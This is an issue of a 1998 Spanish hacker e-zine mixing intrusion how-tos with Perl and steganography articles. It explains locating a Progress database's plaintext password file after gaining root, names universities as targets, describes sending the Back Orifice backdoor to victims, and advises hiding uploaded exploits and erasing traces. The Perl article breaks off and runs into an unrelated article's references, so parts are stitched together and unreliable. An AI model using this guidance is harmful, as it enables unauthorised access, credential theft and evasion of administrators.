----------------------------------------------------
 A�o 2/Numero 14                    �                   Septiempre de 1998
�������������������������������������������������������������������������������
				    �       
	   ----------------------------------------------------

   ooooooo       oo  ooooooo  oooooo     ooooo        oo   oooooo  oooooo
   $$""$$"    o$"$$  $$""$$"  $$       o$$""o,     o$"$$   """$$   """$$
   $$o$$"    $$  $$  $$o$$"   $$$$$$   $$    $$   $$  $$     $$      $$
   $$$$$    $$   $$  $$$$$    $$""""   "$o   $$  $$   $$    $$"     $$"
   $$" $$   $$$$$$$  $$" $$   $$        "$o  $$  $$$$$$$   o$"     o$"
   $$  "$$  $$   $$  $$  "$$  $$ooooo     "$o$$  $$   $$  o$$oooo o$$oooo
   ""   """ ""   ""  ""   """ """""""        ""  ""   ""  """"""" """""""

	   ----------------------------------------------------
				    �
�������������������������������������������������������������������������������
                        "La verdad nos hara libres"
	   ----------------------------------------------------

        
                            Editor: Cytorax y Azumlord
                       Co-editores: Azumlord y GuyBrush
                    RareGaZz Team : 12r, Arkangel, AzumLord, Cytorax  
                                    Grovvy,  Guybrush, KillerBot 
                                    Mr.X, Orion, PaTa, RareTrip,
                                    Senpai, ServerHacker, Vov_77
                                    y Yo_soy.
		   Agradecimientos: Jhocker, Mr.Nexus, Barbwired/Freedom
	  Distribuidores Oficiales: raregazz.islatortuga.com    
				    raregazz.acapulco.uagro.mx   
		     E-mail Ofical: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
	       Saludos (Oficiales): #RaZa MeXicaNa Team, X-ploit Team,
				    MEMR, LIZA.
	   Frase del Dia (Oficial): "ip!, ip!, echame las otras" Azumlord
				    despues de una mala noche.
      Rayadas de Madre (Oficiales): jmasojan, el lamer de mierda que borro
				    los archivos del ftp de la lista de los
				    RareDudeZz y el(los) idiota(s) lamer(s)
				    que avisaron a los de geocities sobre la
				    pagina de SET.
	   Comentarios (Oficiales): Mas vale tarde que nunca :-)


�[ E d i t o r i a l ]��������������������������������������������������������

   Hola de nuevo lector de esta espectacular revista. He decidido hacer esta
editorial, no como las convencionales, sino como una que nos ponga a pensar
un poco, una que nos haga recapacitar, conste que no quiero hacer cambiar de
forma de pensar a nadie, solo que den su punto de vista.

   Por ejemplo todos no atacamos contra todos sin saber la explicacion de lo
que es el bien o de lo que es el mal, muchos acusan a los hackers de ser gente
"mala" pero que es a lo que ellos definen como malo, solo juzgan sin saber
estas importantes definiciones.

   Primero, �que es el bien?, segun Federico Nietzsche es todo lo que eleva en
el hombre el sentimiento de la potencia, la voluntad de la potencia, la
potencia en si.

   Ahora, �que es lo malo?, es todo cuyas raices residen en la debilidad. Como
una peque�a conclusion �Que los debiles y los fracasados perezcan!.

   Bueno creo que con estas dos definiciones podemos empezar a defendernos, ya
que nosotros no hacemos nada malo solo queremos conocer mas, mas y mas a lo
nos lleva a una elevacion de nuestra potencia, que al contrario de hacer algo
malo como la gente dice o divulga, seria el ser una escoria unos debiles y
unos fracasados, que es lo que menos queremos ser y que talvez la gente que
nos acusa de malos tienen miedo a lo que sabemos, como dice en la oracion
anterior �Que los debiles y los fracasados perezcan!, es asi como presento
esta revista, desde otro punto de vista, espero que les sirva de algo y
piensen antes de actuar.

   Esto no fue un sermon o algo por el estilo, sigan adelante que la revista
esta EXCELENTE. NoS vEmOS lUeGO, y LoS dEjO cON eSTA fRaSE:
                                
                 �El amor en la familia en donde se da?
                       En el padre o en la Madre.



	 ���[ C o n t e n i d o s ]������������������������������Ŀ
       �Ĵ                                                        �
       � �  +Editorial -----------------------> Cytorax           �
       � �  +Progress ------------------------> Azumlord          �
       � �  +Manual de Bolsillo de Perl ------> Cytorax           �
       � �  +Web Spoofing --------------------> GuyBrush          �
       � �  +Peligro en Windows --------------> Yo_Soy            �
       � �  +Introduciendo tus exploits ------> Yo_Soy            �
       � �  +Esteganografia ------------------> PaTa              �
       � �  +Curso de Antivirus --------------> Jhocker           �
       � �  +Back Orifice --------------------> Barbwired/FREEDOM �
       � �  +FuCKiNG TeLMeX ------------------> Juan Pablo        �
       � �  +Reflexiones de Nadie ------------> Mr. Nexus         �
       � �  +Bugs y Exploits -----------------> PaTa              �
       � �  +Letz Hack -----------------------> Azumlord          �
       � �  +Accediendo al IRC por telnet-----> Senpai            �
       � �  +Cartas del Lector ---------------> GuyBrush          �
       � �  +NotiLOONZ -----------------------> GuyBrush/Azumlord �
       � �  +Llaves PGP ----------------------> RareGaZz Staff    �
       � �  +DESPEDIDA?? ---------------------> Cytorax/Azumlord  �
       � ����������������������������������������������������������
       ����������������������������������������������������������  

                      "El ser es, y el no ser no es"
           Mi maestra de filosofia tratando de explicar ese dilema.

  01010101010101010101010101010101010101010101010101010101010101010101010
  10                                                                   01
  01 #!/bin/RareGaZzsh                                                 10
  10 # La informacion contenida en este zine tiene fines completamente 01
  01 # de entretenimiento y educativos, los autores de  la informacion 10
  10 # aqui presentada no se hacen responsables de los  posibles da�os 01
  01 # que se puedan ocasionar......                                   10
  10                                                                   01 
  01010101010101010101010101010101010101010101010101010101010101010101010

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Progress -=( Azumlord )=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

�[ D i s c l a i m e r  ]������������������������������������������������������

   La   informacion  aqui  presentada,  tiene  fines  solamente  educativos,
cualquier  uso indebido de la informacion aqui contenida  es responsabilidad
de usted!  ( Demonios,  eso  lo dijeron  en un comercial???), el autor no se
hace  responsable  de  los da�os materiales o psicologicos que sean producto
de un mal uso de lo aqui expuesto.

�[ L a  H i s t o r i a ]������������������������������������������������������

   Progress   Software   Corporation   fue   fundada  en  1981  en  Bedford,
Massachusetts,  E.U.A:  y  es  una  compa�ia  lider en la oferta de bases de
datos,  herramientas  de desarrollo y soluciones empresariales "A Prueba del
Futuro", y para solucionar  los  problemas en los procesos de las empresas y
proveer Ventajas competitivas reales.

   Progress Software  se  empezo a conocer en Mexico a partir de 1989 con la
distribucion de sus productos a traves de los siguientes distribuidores:

	   * 1989 - 1991 : Genetec, Dataflux
	   * 1991 - 1993 : Tecnologia en Desarrollo de Sistemas
		   (Actual Asociado en Aplicaciones Progress)

   En 1993 debido al gran crecimiento y aceptacion de los productos Progress
en Mexico,  la Corporacion decide establecer la representacion directa de la
compa�ia,  fundandose  el  22  de febrero de 1993 la subsidiaria mexicana de
Progress Software Corporation.

�[ Q u e  e s ? ? ]�����������������������������������������������������������

   Progress  es   un  lenguaje  de programacion de cuarta generacion el cual
permite  manejar  grandes  bases  de bases de datos y dar soluciones a todos
los sectores de la industria, como son el sector de Manufacturera, Finanzas,
Distribucion, Salud, Gobierno, Comercio, Telecomunicaciones, Educacion, etc.
y mercados verticales como Contabilidad y Recursos Humanos.

   Progress  provee un ambiente para el desarrollo rapido de aplicaciones en
bases  de  datos  relacionales  y  un conjunto de herramientas de desarrollo
graficas (GUI) y de modo caracter.  Con Progress se desarrollan aplicaciones
empresariales para cliente/servidor y modo host, que son indepedientes de la
base de datos, el sistema operativo, y la interfaz de usuario.

   Progress  incorpora la tecnologia  de  objetos  mediante componentes  que
permiten fabricar y ensamblar aplicaciones rapidamente. Progress es facil de
aprender, las herramientas graficas de desarrollo guian al programador en su
esquema  de  desarrollo, el Progress 4GL es un lenguaje completo con el cual
no  se  requiere de la utilizacion de un lenguaje de tercera generacion para
programar tareas complejas. 

   Adicionalmente, una aplicacion desarrollada en Progress es facil de poner
en produccion, bajo consumo de recursos de maquina y gran portabilidad sobre
multiples plataformas tales como Unix, Windows, AS/400, y Novell.Igualmente,
una  aplicacion  desarrollada  en  Progress puede ser puesta en marcha sobre
otras  base  de  datos  distintas  de  Progress  tales  como Oracle, Sybase,
DB/2-400, SQL Server y ODBC-compliant.


�[ C o m o  H a c k e a r l o ? ? ]���������������������������������������������

   Como  ya  vimos anteriormente, Progress es una herramienta que te permite
administrar  con facilidad y *confiabilidad* grandes bases de datos, asi que
en la  mayoria  de los casos se restringira el acceso a estas bases de datos
utilizando un password  y estableciendo determinados permisos a cada usuario
de estas bases de datos.

   Tb.  como  ya se establecio anteriormente Progress es una herramienta con
la cual se  generan  apliaciones INDEPENDIENTES del Sistema Operativo,  pero
suponiendo que  el  Progress se este corriendo bajo un ambiente Unix, lo que
tendrias que  hacer es obtener root en ese sistema o por lo menos un usuario
con permisos de  administrador,  despues de que ya hayas obtenido  alguno de
los dos, viene  lo  mas  sencillo,  encontrar  el archivo de passwords, esto
sera  algo  sencillo   si  tomamos   en cuenta  que  puede  tener  cualquier
nombre pero su terminacion tiene  que  ser  *.d,  de  tal  manera que puedes
ejecutar este comando para encontrarlo.

 #find / -name *.d -print

  En este caso el archivo tenia un nombre muy obvio usuario.d y su contenido
es el siguiente:

"administrador" "Administrador del Sistema" "adm000.p" "per001" "1" "Eureka"
 |-----1-----|   |---------2------------|    |---3---|  |--4--| |5| |--6--|

  1.- Nombre de Usuario
  2.- Informacion adicional sobre el usuario
  3.- Rutina para verificar el passwd
  4.- Perfil del usuario algo asi como el .profile
  5.- Privilegios del usuario.
  6.- Password 

   Como se puede ver cada  campo esta separado por comillas y un espacio en
blanco, ademas el password aparece desencriptado };-)

 NOTA: Como  ya  comente  anteriormente el Progress es todo un lenguaje de
       programacion, es decir, en algunos casos los administradores pueden
       cambiar la rutina  que verifica el password, o agregar algun metodo
       de encriptacion del mismo. PERO al parecer todas las  instituciones,
       empresas u organizaciones que adquieren el Progress reciben un curso
       de capacitacion, el cual es el mismo para TODOS, si, si ya se que se
       estaran preguntando y eso que????, pues si el curso es el mismo para
       todos quiere  decir que estaran  usando rutinas muy semejantes a las
       que  expuse,  quiero  agregar  que yo  lo probe en dos instituciones
       diferentes y usaban el mismo metodo :-)

�[ Q u i e n  l o  u s a ? ? ]������������������������������������������������

   Como ya se habran dado cuenta, Progress es una herramienta muy versatil,
y es usado en todos los sectores de la industria, pero no estaria nada mal
saber quien lo usa exactamente, jeje bueno pues he aqui una lista muy buena,
de las Universidades que usan esta "oh!, gran herramienta" };-)

   Fue una verdadera pena solo encontrar las Universidades que utilizaban
esta herramienta, me hubiese gustado haber encontrado tambien a las empresas
e instituciones que utilizan el Progress. :-(

ITAM
http://www.itam.mx

ITESM (10 campus)
http://www.sistemas.itesm.mx

UNIVERSIDAD DE LAS AMERICAS (UDLA)
http://www1.udla.mx/index.html

UNIVERSIDAD POPULA AUTONOMA DEL ESTADO DE PUEBLA (UPAEP)
http://www.pue.upaep.mx

UNIVERSIDAD LA SALLE
http://www.ulsa.mx

UNIVERSIDAD CHAPULTEPEC
http://www.univchapultepec.edu.mx

UNIVERSIDAD LATINOAMERICANA (ULA)
http://www.ulanet.mx

UNIVERSIDAD DEL VALLE DE MEXICO (7 CAMPUS)

INSTITUTO TECNOLOGICO DE CELAYA

UNIVERSIDAD VERACRUZANA

INSTITUTO POLITECNICO NACIONAL (C.I.C)

UNIVERSIDAD IBEROAMERICANA GOLFO CENTRO
http://www.uiagc.pue.uia.mx

UNIVERSIDAD AMERICANA DE ACAPULCO
http://www.uaa.edu.mx

CENTRO NACIONAL DE INVESTIGACION Y DESARROLLO TECNOLOGICO

UNIVERSIDAD LATINA DE AMERICA

UNIVERSIDAD ISEC

INSTITUTO DE ESTUDIOS SUPERIORES DE TAMAULIPAS
http://www.iest.mx

UNIVERSIDAD KINO
http://www.unikino.mx

UNIVERSIDAD AUTONOMA DE NUEVO LEON
http://www.dsi.uanl.mx

UNIVERSIDAD DEL NORTE
http://www.uninorte.edu.com

UNIVERSIDAD REGIOMONATANA
http://www.ur.mx

   Que!!!!!!!!??????????,  que  porque  las  Universidades  adquirieron  el
Progress???, lo adquirieron para manejar cosillas sin importancia como  son
las  calificaciones y colegiaturas de los alumnos, nominas de los maestros,
y cosas por el estilo....... ;-)

�[ D e s p e d i d a ]�����������������������������������������������������������

   Pues bien eso es todo, son las 2:43 a.m. y tengo un sue�o de la chingada
ah!!!, casi  lo  olvido  quiero  pedir  disculpas  por el uso repetitivo de
las palabras tales como, "Como" y similares............

-//-\-//-\-//-\-//-\-//-\-//-\-//-\-//-\-//-\-//-\-//-\-//-\-//-\
-\-//-\-//-\-//-\-//-\-//-\-//-\-//-\-//-\-//-\-//-\-//-\-//-\-//


                   \   /                     
   Por: Cytorax    \  MANUAL DE BOLSILLO DE PERL I  / 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
  
                   \   /                     

                     http://members.xoom.com/cytorax/                     
                    http://members.tripod.com/~cytorax/                   


 INTRO
   Perl que significa "Practical Extraction and Report Language" es un
lenguaje de programacion medianamente nuevo, el cual surgio de otras
herramientas de UNIX como son : sed,grep,awk,c-shell. Principalmente sirve
para labores de procesamiento de texto, lo cual lo hace en una forma facil y
clara, no como es en C o Pascal; tambien sirve para la programacion de
software de sistemas; y ahora ultimo se ha consolidado como "el" lenguaje
para programar aplicaciones para WWW, por ejemplo un programa que ponga en
pantalla las notas de un alumno dada su matricula, etc. Por todas estas
potencialidades es que estudiaremos Perl.

Nuetro primer programa sera el ya tipico, que imprime Hola, Mundo! : 

#!/usr/local/bin/perl
print "Hola, Mundo!\n";

La primera linea lo que hace es llamar al compilador de Perl.
La segunda linea imprime Hola, Mundo! y un cambio de linea(\n).
Debemos decir que todas las lineas (salvo contadas excepciones) de un programa 
en Perl terminan con ';' . 
Veamos un programa ahora en el cual se interactua con el usuario : 

#!/usr/local/bin/perl
print ("Cual es tu nombre?");
$nombre=
 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
   o en el (609) 258-5906


Referencias
-----------

[1] Peter G. Neumann. Computer-Related Risks. ACM Press, New York, 1995.

[2] Gary McGraw and Edward W. Felten. Java Security: Hostile Applets, Holes 
and Antidotes. John Wiley and Sons, New York, 1996.

[3] Robert T. Morris. A Weakness in the 4.2BSD UNIX TCP/IP Software. Computing 
Science Technical Report 117, AT&T Bell Laboratories, February 1985.

[4] Steven M. Bellovin. Security Problems in the TCP/IP Protocol Suite. 
Computer Communications Review 19(2):32-48, April 1989.

[5] Steven M. Bellovin. Using the Domain Name System for System Break-ins. 
Proceedings of Fifth Usenix UNIX Security Symposium, June 1995.

[6] Web site at http://www.anonymizer.com

[7] Web site at http://www.metahtml.com/apps/zippy/welcome.html


Traduccion
----------

Traducido por [Tosh]
BBK "Big Bro Killerz"

 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
http://www.geocities.com/SiliconValley/Pines/7347/

-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|

		   ��������������������������������������Ļ
		   �                                      �
		   �          PELIGRO EN WINDOWS          �
		   �   Original de Yo Soy para RareGaZz   �
		   �  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  �
		   ��������������������������������������ļ

 Al parecer el uso de ciertas utilidades para tener acceso sobre plataformas
 windows, estan creciendo, tan solo unos ejemplos son: el hacer Spoofing
 a usuarios de ICQ o conectarse remotamente con aplicaciones que actuan como
 "backdoors" permitiendo asi la entrada a personas desconocidas al sistema.

 Un ejemplo de estas "backdoors" es el famoso programa - Back Orifice - ,
 este ultimo del grupo cDc (Cult of Dead Cow). El usuario fisico ejecuta el
 programa que funciona como "servidor" para el programa "cliente". La persona
 que tiene el programa cliente tiene dominio sobre el sistema, pudiendo hacer
 por ejemplo: Ejecutar aplicaciones, abrir un puerto para entrar via http,
 subir y bajar archivos, asi como eliminalos y modicarlos, ver lo que escribe
 el usuario en la pc remota, ver su pantalla, abrir la unidad de cd-rom, solo
 por decir algunas cuantas...

 De echo, la persona que ejecuta el programa "servidor", ni cuenta se da de
 que ha dejado su sistema a merced del "intruso"; quien, si es malicioso
 intentara joder el sistema de alguna manera. El programa se auto-copia a
 otra locacion dentro del mismo disco duro , modifica el registro del sistema
 de manera que cada vez que se inicie windows se auto-ejecute, impidiendo asi
 que el usuario lo note facilmente.

 TU MISMO puedes estar bajo estas influencias ahora mismo y ni siquiera lo
 sabes.... 

 Las posibilidades son infinitas ( te imaginas mandar el backdoor a un admin
 que utilice NT, jaja, tendremos control sobre las cuentas y todo el sistema).

 Microsoft fue notificado, podemos ver unos cuantos bytes sobre el tema en:
 http://www.microsoft.com/security/bulletins/ms98-010.htm

 E ISS's no se queda atras:
 http://www.iss.net/xforce/alerts/advise5.html

  
 __ UTILIZANDO LAS BACKDOORS...


 Pues esto esta muy facil, tienen que empaquetar el programa "server" del
 programa en cuestion (patch.exe o boserver.exe ) y enviarlo a la "victima"
 quien lo ejecutara y asi te podras conectar tu... (no tiene mucho chiste...)
 Por cierto el BO hay una version para Unix/Linux.

 - Desventajas:


   __ Ya lo hice, pero como me conecto si no tengo su IP ?

   Pues la principal desventaja es que tienes que investigar la ip del
   usuario victima para poder hacer la conexion, esto no es muy dificil si
   estamos via IRC con el comando /dns nick_victima y con ICQ utilizando la
   opcion info, o si esta escondida, utilizando el ICQ Spoofer ;)
   [Disponible ya en la web de RareGaZz]

   __ Ya lo hice, pero no tiene ICQ y no esta via irc...

   En caso de que se trate de algun Admin de un server, pues prueba con su
   dominio y en la mayoria de los casos funciona.
					
   __ Nope, se trata de un amigo al que le quiero jugar una broma..

   Ups!, si se trata de un usuario con I.P dinamica, pues ya valiste..
   Tendras que ingeniartelas para obtener su I.P...(de esta forma no estas
   de lamercillo destruyendo sistemas..)

   __  Oh! Diablos!! Ejecute boserve.exe en mi maquina!!!..

   Jajaja!!! que cosa :P, bueno no todo esta acabado, existe un programa
   llamado B.O.R.E.D. (Back Orifice Recognition, Extraction and Deletion)
   que se encarga de protegerte del uso de Back Orifice (huy... que miedo :)
   [ Proximamente en la web de RareGaZz ]

   <->

   Saludos a: #RaZa-MeXiCaNa Red Latina, dR-SeuSs, Megaflop, xDAWN, GuyBrush,
   Acidgum, He|io, PlaXiuS, SufferBoy, y los demas... :)

						<=Yo-Soy=> 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

		   ��������������������������������������Ļ
		   �                                      �
		   �      INTRODUCIENDO TUS EXPLOITS      �
		   �     por Yo Soy (
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 )    �
		   �  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  �
		   ��������������������������������������ļ


  Digamos que tienes una cuenta en un sistema y que vas a hacer unas cuantas
  cosas divertidas ;) ... Bueno , conseguimos unos exploits en nuestro lugar
  preferido ( Bugtraq, Rootshell o RareGaZz :D , etc ) y Ohh que diablos !
  Como los introduzco ?
  
  Bueno, aqui podemos hacer varias cosas:

  a) Usar el FTP para subirlos al home de la cuenta (algo sospechoso)
  b) Mandarlos via e-mail (menos sospechoso)
  c) Escribirlos directamente en la shell (menos sospechoso y mas tardado)
 

  A) FTP

    Muy simple, utilizando el comando ftp o con un cliente ftp
    nos conectamos al host que queremos, subimos los archivos y ya..
    ( no es muy recomendable, pues deja logs, si el admin se pone a ver
    se dara cuenta que un hacker le andaba por ahi, sobre todo si tus
    exploits fallan... )

  B) E-MAIL

    Esta forma seria menos sospechosa, pues los usuarios utilizan el
    correo en forma normal y no se notaria el asunto de nuestros
    programillas, seria casi indetectable, pero puede tener el
    inconveniente de ser tardado, dependiendo de la distancia entre
    tu y el host...

   C) ESCRIBIENDOLOS

    Aqui utilizariamos un editor y estariamos como weyes escribiendo
    letra por letra todo el fucking exploit, pero hay una forma mas
    facil que es utilizando el comando cat e ir pegando el exploit
    a la terminal.

      Ejemplo:

      varf:~:$ cat > mundo.c << STOP
      #include 

      main()
      {
      printf("Hola mundo! :P\n"):
      }
      STOP
      varf:~:$
      varf:~:$ cat mundo.c
      main()
      {
      printf("Hola mundo! :P\n"):
      }
      varf:~:$
      varf:~:$ cc -o mundo mundo.c
      varf:~:$ mundo
      Hola mundo! :P
      varf:~:$

    Aqui utilizamos "cat > nombre.c << STOP" para meter los archivos desde
    la terminal, pudiendo cortar el contenido desde otro editor y despues
    pegarlo en la terminal, despues cuando escribimos STOP se detiene la
    forma de introducir infromacion y se salva el archivo. Despues usamos
    cat de nuevo para ver como quedo el archivo, y vemos que la palabra
    STOP no se quedo en el contenido del archivo, despues compilamos con
    cc y ya... facil :)

    Recuerda siempre borrar los exploits (funcionen o no), y si consigues
    root eliminar las pocas huellas que hay para que el admin no se ponga
    sospechoso...  Disfruten...                                

						    <=>  Original en CRH #2

����������������������������������������������������������������������������ͻ
���������������������������������������������������������������������������ͻ�
��������������������������������������������������������������������������ͻ��
���               ESTEGANOGRAFIA O EL ARTE DE ESCONDER LOS DATOS           ���
���                               por PaTa                                 ���
��������������������������������������������������������������������������ͼ��
���������������������������������������������������������������������������ͼ�
����������������������������������������������������������������������������ͼ

	�Que es la esteganografia? te preguntaras,  bueno pues  es un conjunto
de tecnicas que nos permiten ocultar cualquier tipo de datos.

	La  diferencia  entre  esteganogarfia y criptografia,  es  muy  simple
mientras que la criptografia modifica  los datos para que no sean legibles, de
todos es sabido la forma de trabajar del pgp,  la  esteganografia  simplemente
los oculta, aunque hoy en dia ambas tecnicas son facilmente compatibles con el
uso de los ordenadores actuales.

	Esta tecnica no es nada nueva, data de bastante tiempo, por ejemplo en
la  segunda  guerra mundial los aliados usaban esta  tecnica  para comunicarse
con la resistencia alemana por medio de cartas.  

	La innovacion en esta tecnica se ha dado  gracias  a  la llegada de la
informatica y los  ordenadores, se ha pasado de por ejemplo escribir con tinta
invisible que solo se ve al acercar una fuente de calor, cosa  que todos hemos
visto  en  las peliculas de espias, a modificar archivos de audio  o  graficos
para que estos contengan a su vez otros archivos.

	La esteganografia  nos puede servir para comunicarnos sin que la gente
se de cuenta ya que por ejemplo   si  usas el pgp la gente piensas que ocultas
algo, cosa que a mi me sucede yo tengo un amigo, al que le digo que use el pgp
para comunicarse conmigo y el me dice  que  no  tiene nada ilegal que decirme,
espero que al leer esto cambies de idea :o) bueno  como  dice  Phil  Zimmerman
autor del pgp "Si se convierte la privacidad en algo ilegal, solo los ilegales
tendran privacidad".

	El medio ideal para usar la estaganografia es aquel en donde se suelen
realizar escaneos automatizados de mensajes, o donde puede ser sospechoso usar
otros  medio de encriptacion criptografica, por ejemplo si en el trabajo  usas
continuamente  pgp  pueden  que  alli  alguien  se  empice a mosquear, o si la
paranolla   invade   tu   vida :o)  para  esos  momentos  nada  mejor  que  la
esteganografia.


	Aunque claro segun  donde estemos no podemos dar un salto radical a la
esteganografia, si estamos trabajando, y usamos continuamente pgp, y cambiamos
de la noche al dia a la esteganografia,  podemos  levantar sospechas, para eso
es mejor una  preparacion del entorno,   en   ese   caso   deberiamos  empezar
a  interesarnos  por  las matematicas del caos y fractales, y  despues  de  un
tiempo empezar a intercambiar  fractales  con nuestro anterior comunicante del
pgp.

	Por lo que todo el mundo debe tener  precauciones  en sus mensajes por
mail si no ya se esta viendo lo que le esta pasando a Bill Gates, y sus mail a
sus subordinados, en el juicio anti-monopolio en E.E.U.U.

	El correo electronico poco a poco va sustituyendo al normal,  en todos
los  aspectos  pues  de  todos es conocida su aplastante  superioridad sera la
norma para todo el mundo, no la novedad que es hoy en dia.

	Los  gobiernos   no  solo  el  norteamericano tambien recientemente el
espa�ol con su articulo 52 pretenden  proteger  nuestro correo electronico con
sistemas de encriptacion dise�ados por ellos.  Probablemente  la  mayor  parte
de la gente aceptara eso. Pero quizas algunos prefiraos utilizar otras medidas
propias, si o  recordemos  el  DES  vencido  en tres horas y con un  ordenador
de tan solo cuarenta millones de pesetas.


	Las  agencias de inteligencia  tienen  acceso  a  buenos  sistemas  de
criptografia,   tambien  los grandes traficantes de armas y drogas. Igualmente
los fabricantes, las multinacionales  y  otros  gigantes corporativos. Pero la
gente  normal  y  corriente, las organizaciones de   andar por casa, no tienen
acceso a tecnologia ,pero se puede resolver con otro tipo de tecnicas, como la
esteganografia.

	Ahora voy a poner algunos programas y su uso mas basico:



      �������������������������������������������������������������ͻ
      �                          TEXTO                              �
      �������������������������������������������������������������ͼ

        Texto,  que  a  pesar  de su nombre no es un programa espa�ol, ha sido
escrito por Kevin Maher, y es un  programa que transforma archivos codificados
con uuencode o archivos encriptados  con  PGP  con  ASCII armor en archivos de
texto que contienen frases en ingles.

        Los  textos  producidos  por  Texto  son,  ante  todo,  extra�os.  Los
aficionados al surrealismo disfrutaran con este programa.

        Aqui teneis un peque�o ejemplo:

The printer weakly leans to the cold planet. I outwit bright units near the
new cosmetic barn. Sometimes, hats count behind cold windows, unless they're
cosmetic. Never count strangely while you're riping through a cold car. We
easily love around secret clear monoliths. While pins really learn, the cats
often eat on the ajar hens. Other usable strange games will darken fully with
forks. Going below a corner with a brush is often tall. Have a filthy pool.
The cosmetic floor rarely dreams. Tell the clear book it's fully tooting
against a dust. Many clear powerful eggs will smile slowly to pools. To be
dense or dense will cause sly pins to float. Will you question the quiet cold
codes? Let's connect near the obtuse cafes, but don't write the filthy papers.

	Texto  sustituye  los  caracteres  ASCII  por  palabras  en ingles que
obtiene  de un archivo llamado words. Despues utiliza estas palabras segun las
estructuras  de  frases  contenidas en un archivo llamado structs, creando asi
el texto en ingles.

	El  gran  problema  que tiene este programa: el texto obtenido es DIEZ
VECES mayor que el archivo original.

	Otros  dos  inconvenientes,  de mucho menor importancia tienen que ver
con el uso de archivos codificados con  uuencode:  el primero es que se pierde
la informacion  sobre  el  nombre y el modo de acceso del archivo original; el
segundo es que el texto producido puede llegar a ser demasiado repetitivo.


Ejemplos

texto archivo_encriptado > archivo_de_texto

Transforma el contenido  de archivo_encriptado (un archivo PGP con ASCII armor
o un archivo codificado con uuencode) en texto en ingles.

texto -p archivo_de_texto > archivo_PGP

Convierte el texto en  ingles  de archivo_de_texto en un archivo PGP con ASCII
armor.

texto -u archivo_de_texto > archivo_uuencode

Lo mismo que el anterior ejemplo, pero con uuencode.



      �������������������������������������������������������������ͻ
      �                        MANDELSTEG                           �
      �������������������������������������������������������������ͼ

	El  programa  Mandelsteg  ha  sido  escrito  por  Henry Hastur y puede
distribuirse gratuitamente.  Esta  en  realidad  formado  por  dos  programas:
mandelsteg,  que  genera  archivos  gif  de fractales de Mandelbrot en los que
guarda  los  datos  que  se  pasan  como  entrada   segun   las  opciones  que
indiquemos en  linea  de comandos, gifextract, que toma las imagenes generadas
por mandelsteg y extrae los datos.

	Mandelsteg tiene  diversas  opciones  que utilizaremos dependiendo del
nivel de seguridad deseado.

       Si simplemente ejecutamos mandelsteg sin opciones, el programa generara
un gif de 640x480 de la seccion del conjunto por   defecto  de  un  fractal de
Mandelbrot.  Con  la  opcion -c, calculara cuantos bytes pueden almacenarse en
la imagen, y con -e tomara  los  datos  de  la  entrada y los almacenara en la
imagen. Podemos especificar un nombre de archivo despues de -e para el archivo
gif. Con -r, generara bytes aleatorios que colocara en la imagen, de forma que
podremos generar imagenes sin datos verdaderos para crear confusion.

	Con el nivel  de  seguridad  minimo  que proporciona la opcion -e, los
datos seran guardados en el bit 7 de cada pixel y   se generara  una paleta de
128  colores de tal forma que los pixels tengan el mismo aspecto,  contengan o
no da tos. Esto es suficiente para burlar vigilancias inexpertas, pero alguien
que conozca  estas  tecnicas podra descubrir facilmente que la imagen contiene
datos.  Por  ejemplo,   sustituyendo  la  paleta  por  otra,  se  distinguiran
claramente los datos ocultos  en areas de la imagen donde hay colores solidos.
Esto se puede evitar con la opcion -ns,  que hara  que se almacenen datos solo
en  areas  donde   no  haya  colores  solidos.  Eso  si,  esta  opcion  reduce
drasticamente el numero  de datos que puede almacenar la imagen, asi que antes
de utilizarla "directamente", conviene hacer primero una prueba con la opcion
-c.

Ejemplos

mandelsteg -e fractal.gif < archivo.txt

Genera un fractal que almacena  en fractal.gif, imagen de 640x480, e introduce
los datos de archivo.txt.

mandelsteg -sz 400 400 -md -0.5505 -0.5505 0.0001 0.0001 -e fractal.gif
< archivo.txt

Crea un fractal utilizando coordenadas distintas de las empleadas por defecto,
lo almacena en una imagen de 400x400 e introduce los datos de archivo.txt.

mandelsteg -ns -sz 320 240 -c > /dev/null

Muestra por pantalla la cantidad de   informacion  que  puede almacenar en una
imagen de las caracteristicas indicadas.

mandelsteg -fp -r -ns -e falso.gif < /dev/null

Crea  un  fractal  que  almacena  en falso.gif y que contiene datos aleatorios
(util para despistar o hacer perder tiempo).

Por cierto, salvo que se tenga un  Pentium  potente, hay que ser pacientes con
este programa. El calculo de fractales supone muchas operaciones en coma
flotante...



      �������������������������������������������������������������ͻ
      �                        GIFEXTRACT                           �
      �������������������������������������������������������������ͼ

Gifextract  simplemente  toma  como  entrada una imagen y extrae los datos que
contiene  por  defecto, los extraera del  bit 7,  asi  que  si almacenamos los
datos en algun bit  distinto, habra que indicarselo con la opcion -b.  Tambien
si usamos la opcion -ns o -bp  al  generar la imagen con mandelsteg, habra que
utilizarlas con gifextract para extraer los datos correctamente.


Ejemplos

gifextract -b 4 < imagen.gif > datos.txt

Extrae  los  datos  almacenados  en el bit 4 de los pixels de imagen.gif y los
guarda en datos.txt


Cuestiones de seguridad

	La pregunta es:  �es  seguro el uso de Mandelsteg? Pues la realidad es
que no (pero... �esperad, leed  primero  las razones y despues encontrareis la
solucion!).

	 Las razones:

	 Los parametros de  encriptacion  si  se  saben  de  puede  reproducir
igualmente  por  lo  que  no  conviene  usar dos veces las mismas coordenadas,
ademas estar cambiando continuamente es un  poco  engorroso  porque al otro le
tienes que decir las coordenadas usando un medio de comunicacion seguro. 



